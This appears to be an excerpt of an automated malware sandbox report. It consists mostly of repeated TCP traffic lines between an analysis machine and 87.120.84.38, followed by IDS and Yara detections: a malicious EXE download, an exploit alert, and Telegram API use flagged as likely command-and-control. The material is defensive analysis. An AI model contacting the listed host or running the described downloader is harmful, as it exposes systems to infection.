                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.84.38:80

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 87.120.84.38:80 -> 192.168.2.22:49165
                  Source: Network trafficSuricata IDS: 2827449 - Severity 1 - ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123) : 87.120.84.38:80 -> 192.168.2.22:49165
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 8.2.cmnjgyugo61000.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, type: UNPACKEDPE
